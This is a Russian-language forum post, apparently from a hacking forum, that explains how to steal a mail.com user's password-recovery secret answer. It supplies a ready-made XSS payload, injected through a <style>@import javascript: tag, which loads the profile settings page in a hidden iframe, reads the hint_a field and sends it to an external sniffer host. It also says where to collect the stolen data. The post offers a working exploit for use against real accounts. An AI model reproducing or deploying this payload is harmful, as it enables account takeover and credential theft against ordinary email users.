Jump to content

Levon_78

Forumjan
  • Posts

    10
  • Joined

  • Last visited

About Levon_78

  • Rank
    Newbie
    Newbie
  1. WWW.MAIL.COM Если воспользоваться службой напоминания пароля, то для его получения достаточно ввести правильный ответ на секретный вопрос (один из вариантов). Значит ставим перед собой задачу получить этот ответ. Делается это легко. Когда я зашел в свойства почтового ящика и просматрел регистрационную информацию, то уидел, что ответ на секретный вопрос не скрывается, что и позволяет нам с помощью JavaScript считать его значение. Внедряем скрипт через тэг <style>. <style>@import url(java script:alert());</style> Адрес страницы с настройками: http://mail01.mail.com/scripts/common/genprofile.cgi Имя формы: profileform Имя поля text с секретным ответом: hint_a В итоге, чтобы украсть секретный вопрос, нужно вызвать страницу настроек, запустить JavaScript, получить значение document.profileform.hint_a.value, и передать его на сниффер вместе с переменной среды окружения REQUEST_URI. Готовый вариант: <style>@import url(java script:document.getElementById('out').innerHTML="<%69%66rame src=http://mail01.mail.com/scripts/common/genprofile.cgi name='zero' %6FnLoad=`str=document.zero.profileform.hint_a.value; path='http://zero.h12.ru/stat/capt.php?'; document.zero.location=path+str`></%69%66rame>");</style> <span id='out'></span> В сгенерированном фрейме с именем zero загружается страница настроек. По окончании загрузки, обработчик OnLoad запускает скрипт считывания секретного вопроса, а после, через этот же фрейм отправляет ответ на сниффер. Теперь достаточно зайти по адресу http://zero.h12.ru/stat/log.php, и найти нужную информацию в строке "Host".
×
×
  • Create New...